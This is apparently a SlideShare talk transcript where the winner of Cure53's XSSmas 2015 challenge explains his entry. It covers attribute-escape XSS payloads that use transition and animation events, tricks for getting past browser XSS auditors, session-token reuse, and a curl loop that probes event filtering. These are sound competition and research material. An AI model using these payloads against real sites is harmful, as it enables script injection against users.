SlideShare a Scribd company logo

A XSSmas carol

C
cgvwzq

Brief story about my vectors and process during the Cure53's XSSmas15 challange. https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2015

Software
1 of 36
Download to read offline
A XSSmas carol by pepe vila
whoami Name: Pepe Vila (@cgvwzq) Location: Spain Work: - before: pentester at EY - current: PhD student at IMDEA Software Interests: - try to understand browsers, XSS challenges, CTFs, computationalism, space exploration...
whoami Name: Pepe Vila (@cgvwzq) == btoa("pepe").toLowerCase().replace(/[=+]/g,'') Location: Spain Work: - before: pentester at EY - current: PhD student at IMDEA Software Interests: - try to understand browsers, XSS challenges, CTFs, computationalism, space exploration...
Official Write-up: https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2015 Summary ● index.php: xss w/o UI on <div> element ● token.php: bypass document.location JS check ● index2.php: Angular JS template injection ● index3.php: xss w/o UI on <p> element the challenge
the challenge shortcut! Official Write-up: https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2015 Summary ● index.php: xss w/o UI on <div> element ● token.php: bypass document.location JS check ● index2.php: Angular JS template injection ● index3.php: xss w/o UI on <p> element
what we know? Hints probably don’t help too much a priori. But after many some test & error we can learn: - Browser anti-XSS (on IE, Chrome and Opera) - token == sessionid => same token used everywhere - index3.php checks token and Referer header - requests to index.php and index3.php regenerate the sessionid - we don’t need to include the .php extension - paths after a valid resource are ignored on server side (e.g.: http://domain/index/foobar/ == http://domain/index.php )
what we know? - index.php reflects $_GET[‘xss’] in <div class=’<INJECTION>’>·–·</div> … <script src="token.php?token= <TOKEN>&callback=document.write" ></script> use htmlentities, but we can escape the attribute context with single quotes - fortunately the <script> string is stripped, so we can bypass anti-XSS filters
what we know? - index3.php checks Referer header (for the string “/index2.php”) and the token - if ok reflects $_GET[‘xss’] in <p class='<INJECTION>'></p> again with htmlentities, so we escape attribute context - no stripping this time, but some blacklisted events are replaced by “onend” - a CSS comment tell us to “get some ‘css’?” so we can inject also in <style> context
what we know? - index3.php checks Referer header for the string “/index2.php” and for a valid token - if ok reflects $_GET[‘xss’] in <p class='<INJECTION>'></p> again with htmlentities, so we escape attribute context - no stripping this time, but some blacklisted events are replaced by “onend” - a CSS comment tell us to “get some ‘css’?” so we can inject also in <style> context
ideas <div contenteditable id=x onfocus=alert(1)></div> + target (all but FF) vs. <div onbeforescriptexecute=alert(1)><script></script></div> (only FF) Firefox has no anti-XSS, but I couldn’t get execution on /index3.php :( And… onanimationstop is translated into onanimationend which is a valid event :) and because the replace XSS Auditor does not match :D
ideas I also wrote a bash script to list all non-replaced events: #!/bin/bash TOKEN="$1" for i in $(cat events.txt); do curl -s -H "Cookie: PHPSESSID=${TOKEN}" -H "Referer: http://any/index2.php" "https://xssmas2015.cure53.co.uk/index3?token=${TOKEN}&xss='${i}=alert(1)" | grep '<p class' | grep -v "'onend" done What gave me some events to JSfiddle with: onafterscriptexecute,onariarequest,onautocomplete,onautocompleteerror,onbeforescriptexecute,onbeforeupdate,oncancel,onclose, oncommand,oncompassneedscalibration,oncuechange,ondevicelight,ondevicemotion,ondeviceorientation,ondeviceproximity,ondurationend, onfullscreenchange,onfullscreenerror,ongotpointercapture,onhashchange,oninput,onlanguagechange,onlostpointercapture, onmozfullscreenchange,onmozfullscreenerror,onmozpointerlockchange,onmozpointerlockerror,onmscontentzoom,onmsfullscreenchange, onmsfullscreenerror,onmsgesturechange,onmsgesturedoubletap,onmsgestureend,onmsgesturehold,onmsgesturestart,onmsgesturetap, onmsgotpointercapture,onmsinertiastart,onmslostpointercapture,onmsmanipulationstatechanged,onmspointercancel,onmspointerdown, onmspointerenter,onmspointerleave,onmspointermove,onmspointerout,onmspointerover,onmspointerup,onmssitemodejumplistitemremoved, onmsthumbnailclick,onpage,onpointercancel,onpointerdown,onpointerenter,onpointerleave,onpointerlockchange,onpointerlockerror, onpointermove,onpointerout,onpointerover,onpointerup,onpopstate,onratechange,onrowsdelete,onrowsinserted,onshow,ontoggle, onuserproximity,onwebkitfullscreenchange,onwebkitfullscreenerror, onwebkittransitionend* ,onwheel
my first solution ?xss=’contenteditable+id=x+onfocus<script>=’ location=`index3?token=${all[55].src. substr(48)}%26css=@keyframes+x{%26xss=%2527style=animation-name: x+onanimationstop=alert(location)//index2.php `#x So in order to test the validity before starting the “shortening” contest, I submit the following: document.all[xx].src is the shortest* way to the token string: + We save the “document” because it’s in the scope of any event. + @keyframes+x{ we don’t even need to close the curly bracket - URL encoding is always ugly and expensive :S * I also tried innerHTML (9) instead of all[xx].src (11), but no luck. (cookie is also HTTP only)
my first solution ?xss=’contenteditable+id=x+onfocus<script>=’ location=`index3?token=${all[55].src. substr(48)}%26css=@keyframes+x{%26xss=%2527style=animation-name: x+onanimationstop=alert(location)//index2.php `#x So in order to test the validity before starting the “shortening” contest, I submit the following: document.all[xx].src is the shortest* way to the token string: + We save the “document” because it’s in the scope of any event. + @keyframes+x{ we don’t even need to close the curly bracket - URL encoding is always ugly and expensive :S * I also tried innerHTML (9) instead of all[xx].src (11), but no luck. IDEA -> TEST & ERROR + REMEASURE 189
warm up... ?xss=’tabindex=1+id=x+onfocus<script>=’ location=`index3${all[56].src.slice(41)}% 26css=*{animation:x}@keyframes+x{%26xss=%2527onanimationstop=alert(URL)//index2. php`#x With some improvements… + tabindex=1 also makes elements focusable + we can reuse the ?token= part from all[xx].src + slice (5) vs. substr (6) + General animation CSS property instead of animation-name + Move style attribute inside the CSS context *{animation:x} (14) vs. style=animation:x+ (18) + URL with document in scope makes document.URL :) 161 But the rest of the guys still ahead with ~150 bytes :(
warm up x 2 ?xss=’tabindex=1+id=x+onfocus<script>=’ location=`index3/${all[56].src}%26css=* {animation:x}@keyframes+x{%26xss=%2527onanimationcut=alert(URL)//index2.php `#x An a couple more + No need to slice the token’s URL if we set it as path (same resource requested): /index3/http://xssmas2015.cure53.co.uk/token.php?token=<TOKEN>&callback=document.write equal to /index3?token=<TOKEN>&callback=document.write + Shortest replaced event is oncut, so onanimationoncut will become onanimationend :) * I actually bruteforced all possible 2 char combinations, just in case… -_-’ 151
that was me
reorder you must ?xss=’id=x+onfocus<script>= location=`index3/index2.php${all[56].src}%26css=* {animation:x}@keyframesfx{%26xss=’onanimationcut=’alert(URL) `+tabindex=1#x + onfocus attribute doesn’t need quotes if we don’t break it with spaces BONUS: we can avoid the double URL encoding for the single quote :D + instead of URL encoding the space on the keyframe we can do better with f + moving /index2.php saves us 1 slash (we change the other one for an opening single quote) + tabindex=1’foobartrashhere is the only attribute that still works without an opening single quote 146
JSFiddle results I created an HTML element with ~200 events [1] and played with different attribute combinations and styles. MDN, MSDN and similars are also very helpful. I had previously found ontransitionend, but I just ignored it since it was longer than my current solution, so I even did a tweet of it -_-’ However… At some point the ontransitionend event got fired without setting any CSS property WHY? :S [1] http://pastebin.com/raw/WwcBmz5J
JSFiddle results Focusable elements “grow” and outline-width when focused. So… transition:1s will trigger a transition when we focus any focusable element. And we already know how to do that. + We are reusing the style, id and tabindex properties as well as the location.hash !! + Next steps? 145 ?xss=’onfocus<script>= location=`index3/index2.php${all[56].src}%26xss=’ onwebkittransitioncut=alert(URL)// ${URL}`+style=transition:1s+id=x+tabindex=1#x
‘onf$ck=’#asd!$@41 I got out of ideas many times. Different solutions but all the same length, dead paths, more dead paths… I was trying to reuse more parts of the first injection (tried with replace, slice and concatenation) but I couldn’t save too much :(
never gonna give you up
2paths1injection New idea and wrote Mario asking if getting an alert(URL) in both injection was valid, and he said YES. So I basically broke the Twitter barrier :) Using the same payload in both injections: + Note the extra “&” in order to concat the “xss” parameter + We need to put “oncut” at some place to cheat the anti-XSS. + The 0<script>1 will be syntactically correct but on the second page will throw an “not defined” exception. + XSS Auditor allows the stripped/replaced string to be in any place before “/” or “,” ?&xss=’style=transition:1s+id=x+tabindex=1+onwebkittransitionend=oncut=alert(URL) ||0<script>1,location=`index3/index2.php${all[56].src}${URL}`#x 139
2paths1injection And saved some more bytes.... ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: 0<script>1,location=`index3/index2.php${all[56].src}${URL}`+tabindex=1#x 137
2paths1injection And a few more... This one worth the creativity special prize :D ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 134
2paths1injection And a few more... This one worth the creativity special prize :D But at the end they decided that clicking on the alert(URL) in the first injection was UI and it was against the rules. So... ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 134
2paths1injection And a few more... This one worth the creativity special prize :D But at the end they decided that clicking on the alert(URL) in the first injection was UI and it was against the rules. So... BACK TO 145 :( ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 145
my first shortest solution Fortunately I was pretty sure that the idea could work, and after some more time in front of vim I got this: 141 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut=`<script>`-alert (URL)//`,location=`index3/index2.php${all[56].src}${URL}`+tabindex=1#x What in index.php was: ?&xss='style=transition:1s+id=x+onwebkittransitionend= oncut=``-alert(URL)//` , location=`index3/index2.php${all[56].src}${URL} `+tabindex=1#x And in index3.php: ?&xss='style=transition:1s+id=x+onwebkittransitionend=onend= `<script>`-alert (URL)//`,location=`index3/index2.php${all[56].src}${URL} `+tabindex=1#x ONLY ONE ALERT
a little shorter 137 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=`index3/index2.php${all[57].src}${URL} `+tabindex=1#x + In index.php the condition will be an empty string, so it will take the second path and redirect + In index3.php we take the first one and alert for the glory and fame! :D
a little shorter 137 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=`index3/index2.php${all[57].src}${URL} `+tabindex=1#x + In index.php the condition will be an empty string, so it will take the second path and redirect + In index3.php we take the first one and alert for the glory and fame! :D This was on January 12th, and I could rest until @molnar_g did 136 a week (a very long one indeed) before the end of contest.
JS strings 101 135 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=[`index3/index2.php`,all[58].src,URL] +tabindex=1#x Fortunately I had forgotten a simple trick for concatenating strings, which saved me exactly the 2 bytes I needed: The winner vector
JS strings 101 135 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=[`index3/index2.php`,all[58].src,URL] +tabindex=1#x Fortunately I had forgotten a simple trick for concatenating strings, which saved me exactly the 2 bytes I needed: ?&xss=/index2.php'style=transition: 1s+id=x+onwebkittransitionend=oncut=`<script>`?alert(URL):location=[/index3/,all [58].src,URL]+tabindex=1#x ?&xss=/index2.php'style=transition:1s+id=x+onwebkittransitionend=location=oncut= [`<script>`?alert(URL):/index3/,all[58].src,URL]+tabindex=1#x
Jontransition & Co. A couple of days before the end of the contest this mysterious “guy” appeared in the scoreboard… ~.~ and @phiber told me that I was going to be defeated, driving me crazy. So I started thinking again trying to split, slice, replace the innerHTML in order to save 1 byte more by reusing the “transition” string from “Jontransition”. But I couldn’t improve the vector on that way, so I tried again some other paths...
more ideas ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut=location= [`<script>index3/index2.php`, (all[60]||alert(URL)).src,URL]+tabindex=1#x Alternative 135 solution. ?&xss='style=transition:1s+id=x+onwebkittransitionend= x.oncut-1?location= [`<script>index3/index2.php`,all[60].src,URL] :alert(URL)+tabindex=1#x I thought this idea could save me a couple of bytes, but at the end I couldn’t :( Anyway it is interesting (136): + oncut == null vs. onend == undefined + +null == 0 vs. +undefined == NaN ... oncut-1 == -1 == true vs. undefined-1 == NaN == false
the end At the end Jontransition didn’t make it (or did he? ~.^), and after several days of having fun, learning and suffering I was lucky enough to win :) I hope not having bored you too much, and that you have find at least something interesting... Congrats to the rest of the winners :) Also thanks to Mario, @mmrupp and @filedescriptor for organizing these contests and sharing their knowledge.
questions?
bonus token.php + Server-side checks for the Referer (not empty & different than “xssmas2015.cure53.co.uk”) and for a valid token. + Client-side check: if (document.location.href == document.location.protocol + '//localhost' + location.pathname) callback({foo:”thesecret”}) Web Worker’s context allows to set the document and location properties and importScripts the file. document={location:{href:’//localhost’,protocol:’’}};location={pathname:’’};importScripts(‘https://xssmas2015. cure53.co.uk/token.php?token=<TOKEN>&callback=postMessage So that should bypass the client-side check and get the token for index2.php, but... + Chrome does not send Referer on Web Worker’s requests from Blob URLs (we need an external file). + Chrome neither sends cookies on cross-domain requests from a Web Worker (B req. A), unless the page B which created the Web Worker is loaded in a page-A’s iframe (dafuq :S is this in the spec?)

Recommended

The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
 

Recommended

The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich
 
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyMario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009Mario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
Breaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxBreaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxMathias Karlsson
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
JavaScript Basics with baby steps
JavaScript Basics with baby stepsJavaScript Basics with baby steps
JavaScript Basics with baby stepsMuhammad khurram khan
 
Clean Code
Clean CodeClean Code
Clean CodeISchwarz23
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT - Multimediatreff
 
Cryptography in PHP: use cases
Cryptography in PHP: use casesCryptography in PHP: use cases
Cryptography in PHP: use casesEnrico Zimuel
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
Security and why you need to review yours.
Security and why you need to review yours.Security and why you need to review yours.
Security and why you need to review yours.David Busby, CISSP
 
Massimo Artizzu - The tricks of Houdini: a magic wand for the future of CSS -...
Massimo Artizzu - The tricks of Houdini: a magic wand for the future of CSS -...Massimo Artizzu - The tricks of Houdini: a magic wand for the future of CSS -...
Massimo Artizzu - The tricks of Houdini: a magic wand for the future of CSS -...Codemotion
 
He stopped using for/while loops, you won't believe what happened next!
He stopped using for/while loops, you won't believe what happened next!He stopped using for/while loops, you won't believe what happened next!
He stopped using for/while loops, you won't believe what happened next!François-Guillaume Ribreau
 

More Related Content

What's hot

Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich
 
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyMario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009Mario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
Breaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxBreaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxMathias Karlsson
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT - Multimediatreff
 
Cryptography in PHP: use cases
Cryptography in PHP: use casesCryptography in PHP: use cases
Cryptography in PHP: use casesEnrico Zimuel
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
Security and why you need to review yours.
Security and why you need to review yours.Security and why you need to review yours.
Security and why you need to review yours.David Busby, CISSP
 

What's hot (20)

Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
 
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
 
Breaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxBreaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandbox
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit Creation
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
JavaScript Basics with baby steps
JavaScript Basics with baby stepsJavaScript Basics with baby steps
JavaScript Basics with baby steps
 
Clean Code
Clean CodeClean Code
Clean Code
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
 
Cryptography in PHP: use cases
Cryptography in PHP: use casesCryptography in PHP: use cases
Cryptography in PHP: use cases
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
 
Security and why you need to review yours.
Security and why you need to review yours.Security and why you need to review yours.
Security and why you need to review yours.
 

Similar to A XSSmas carol

Massimo Artizzu - The tricks of Houdini: a magic wand for the future of CSS -...
Massimo Artizzu - The tricks of Houdini: a magic wand for the future of CSS -...Massimo Artizzu - The tricks of Houdini: a magic wand for the future of CSS -...
Massimo Artizzu - The tricks of Houdini: a magic wand for the future of CSS -...Codemotion
 
He stopped using for/while loops, you won't believe what happened next!
He stopped using for/while loops, you won't believe what happened next!He stopped using for/while loops, you won't believe what happened next!
He stopped using for/while loops, you won't believe what happened next!François-Guillaume Ribreau
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup PerformanceJustin Cataldo
 
Aad Versteden | State-of-the-art web applications fuelled by Linked Data awar...
Aad Versteden | State-of-the-art web applications fuelled by Linked Data awar...Aad Versteden | State-of-the-art web applications fuelled by Linked Data awar...
Aad Versteden | State-of-the-art web applications fuelled by Linked Data awar...semanticsconference
 
HTML5 and CSS3 Shizzle
HTML5 and CSS3 ShizzleHTML5 and CSS3 Shizzle
HTML5 and CSS3 ShizzleChris Mills
 
Is HTML5 Ready? (workshop)
Is HTML5 Ready? (workshop)Is HTML5 Ready? (workshop)
Is HTML5 Ready? (workshop)Remy Sharp
 
Is html5-ready-workshop-110727181512-phpapp02
Is html5-ready-workshop-110727181512-phpapp02Is html5-ready-workshop-110727181512-phpapp02
Is html5-ready-workshop-110727181512-phpapp02PL dream
 
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...tdc-globalcode
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)Igor Bronovskyy
 
Web performance essentials - Goodies
Web performance essentials - GoodiesWeb performance essentials - Goodies
Web performance essentials - GoodiesJerry Emmanuel
 
PostgreSQL Open SV 2018
PostgreSQL Open SV 2018PostgreSQL Open SV 2018
PostgreSQL Open SV 2018artgillespie
 
Hidden Gems in Swift
Hidden Gems in SwiftHidden Gems in Swift
Hidden Gems in SwiftNetguru
 
SVCC 2013 D3.js Presentation (10/05/2013)
SVCC 2013 D3.js Presentation (10/05/2013)SVCC 2013 D3.js Presentation (10/05/2013)
SVCC 2013 D3.js Presentation (10/05/2013)Oswald Campesato
 
"Scala in Goozy", Alexey Zlobin
"Scala in Goozy", Alexey Zlobin "Scala in Goozy", Alexey Zlobin
"Scala in Goozy", Alexey Zlobin Vasil Remeniuk
 
